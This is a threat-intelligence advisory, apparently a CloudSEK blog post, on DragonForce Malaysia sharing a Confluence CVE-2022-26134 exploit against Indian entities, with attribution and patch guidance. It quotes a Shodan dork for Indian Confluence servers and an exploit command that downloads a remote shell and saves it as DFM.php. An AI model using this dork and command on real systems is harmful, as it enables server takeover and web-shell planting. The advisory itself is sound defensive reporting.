Schedule a demo

Hacktivist Group DragonForce Actively Targeting Indian Entities, Shares an Exploit for a Critical Confluence Server Vulnerability CVE-2022-26134

  • 7:50 pm
  • Categories: Vulnerability

Summary

XVigil identified a post on a Telegram channel where the hacktivist group, DragonForce Malaysia has shared an exploit to CVE-2022-26134 to actively target and exploit Indian entities.
 
Category: Adversary Intelligence Threat Type: Latest Attack Motivation: Hacktivist Region: India Source*: D4

Executive Summary

THREAT IMPACT MITIGATION
  • DragonForce Malaysia, the hacktivist group actively involved in targeting Indian entities, announced and shared the exploit CVE-2022-26134 which is a Confluence Server vulnerability.
  • The group has also shared a list of dorks targeting the Indian region on their Telegram channel.
  • Actors can scan the internet for vulnerable instances of Confluence servers and leverage this vulnerability to launch attacks against significant Indian entities owned by both the government and private sectors.
  • Look for patches and workarounds for the CVE-2022-26134.
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.
CloudSEK’s contextual AI digital risk platform XVigil identified a post on a Telegram channel where the hacktivist group, DragonForce Malaysia has shared an exploit to CVE-2022-26134 to actively target and exploit Indian entities. CVE-2022-26134 is a critical unauthenticated remote code execution vulnerability present in Confluence Server and Data Center. DragonForce posting updates on their Telegram channel

Analysis and Attribution

Information from Cybercrime Forums

  • On 21 June 2022, a threat actor published a post on a cybercrime forum, mentioning a PoC (Proof of Concept) for the exploit along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.
Shodan Dork: http.favicon.hash:-305179312 country:"IN"
  • The actor also shared a GitHub repository containing the script which can be downloaded and exploited using the following python command:
CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php
  • Later that day, DragonForce Malaysia was seen sharing this exploit to all of their 152,257 subscribers on their Telegram channel.
  • A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
Cybercrime forum post discussing CVE-2022-26134
Cybercrime forum post discussing CVE-2022-26134
 

About DragonForce

  • On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
  • The group’s primary objective of the attack, as claimed by them, was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
  • The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
  • This group owns and operates a forum where they post announcements and discuss their latest activities.
  • The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
  • The group has been conducting regular recruitment and promotion campaigns using Tiktok and Instagram reels.

DragonForce’s Official Communication Channels

Forum : https//dragonforce[.]io
Radio : https//radio[.]dragonforce[.]io
Facebook : https//fb[.]me/dragonforcedotio
Telegram : https//t[.]me/dragonforceio
Twitter : https//twitter[.]com/dragonforceio
Instagram : https//instagram[.]com/dragonforceio
YouTube : https//www.youtube[.]com/channel/UC9GycRXuy7-WMULPBkBp4Bw

Information from OSINT

  • Based on the information from the open web, CloudSEK researchers could identify that as of 4 June 2022 at least 23 unique IPs were exploiting this vulnerability.
  • A Shodan search showed that there are at least 9,396 publicly reachable instances of Confluence on the internet.
Source: Shodan
Source: Shodan
 
  • The data from Cloudflare indicates that this vulnerability is being exploited by multiple sources on a large scale.
Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare)
Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare)
 

Impact & Mitigation

Impact Mitigation
  • DragonForce is associated with multiple hacktivist groups for their campaign against Indian entities. This exploit gives them more opportunities to deface and dump the database of Indian entities.
  • Attackers can use this vulnerability to execute commands remotely.
  • Threat actors can leverage this opportunity to target victims and deploy ransomware.
  • Potential loss of revenue, reputation, and intellectual property.
  • The Confluence Server and Data Center versions need to be updated to the following patched versions:
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.

References

 

Table of Contents

Try XVigil for free

Request an easy and customized demo for free

Be informed in your Inbox
Sign up now to our Threat intelligence Newsletter and be the first to know about threats first in your inbox.
Subscribe now
Join the Discussions
Discuss your way into our Community about these threats and stay Vigilant and informed.
Discuss Now